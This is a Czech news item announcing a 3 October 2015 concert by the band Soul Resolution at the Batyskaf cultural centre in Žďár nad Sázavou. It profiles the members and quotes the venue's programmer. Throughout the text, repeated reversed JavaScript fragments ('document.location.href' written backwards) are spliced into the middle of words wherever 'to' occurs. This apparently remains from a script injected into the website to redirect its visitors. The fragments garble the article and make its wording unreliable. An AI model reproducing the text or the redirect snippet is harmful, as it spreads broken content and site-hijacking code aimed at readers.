Rainbow page separator

Soul Resolution v kulturním centru Batyskaf

Středa, 30. září 2015

Soul Resolution

Žďár nad Sázavou / V sobotu 3. října se ve žďárském Batyskafu představí skupina Soul Resolution složená z mladých hudebníků ze všech koutů Evropy, kteří se potkali na svých studiích v Dánsku. Norský zpěvák Simon Solem, polský altsaxofonista Maciej Kadziela a trombonista Andrzej Jarosinski, český pianista Vít Křišťan a dánská rytmika Emil Möglich (basa) a Andreas Andersen (bicí). Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to opravdu celoevropská sestava hraje hudbu, která čerpá ze soulu, hiphopu i jazzu a uměleckým způsobem zpracovávají ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to směry do osobité fúze, která je nabita energií a skvělými instrumentálními výkony. Kromě originálního zpěvu a neúprosného groovu používá skupina také mnohé zajímavé syntezá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torové zvuky a efekty, které zajišťuje zejména český pianista Vít Křišťan.

„Tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zajímavou kapelu můžeme slyšet hlavně díky vynikajícímu českému pianis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovi Vítkovi Křišťanovi, který se se svými spoluhráči setkal v době svého studia na hudební univerzitě v dánském Odense.“ prozrazuje dramaturg Batyskafu Aleš Kostečka. „Frontman kapely, norský zpěvák Simon, je rozený showman a pro pódium je skutečně jako stvořený. Jeho same[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový hlas dokáže pohladit, za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to když rapuje, i pořádně vyhecovat.“ doplňuje dramaturg.
Hudební vzdělání všech členů a jejich dosavadní spolupráce a zkušenosti zejména na poli jazzové hudby slibují kvalitní hudební zážitek, který navíc roztancuje i ty nejchladnější.
V sobotu nás tedy v Batyskafu čeká mezinárodní hip hop – soulový projekt, který rezonuje doslova celou Evropou. (aka)
Hudební seskupení, ve kterém se setkali muzikanti z Norska, Dánska, Polska a České Republiky.

SOUL RESOLUTION (NOR/DEN/PL/CZ)
03.10. | 21.00 | 100,-/150,-

Batyskaf Žďár nad Sázavou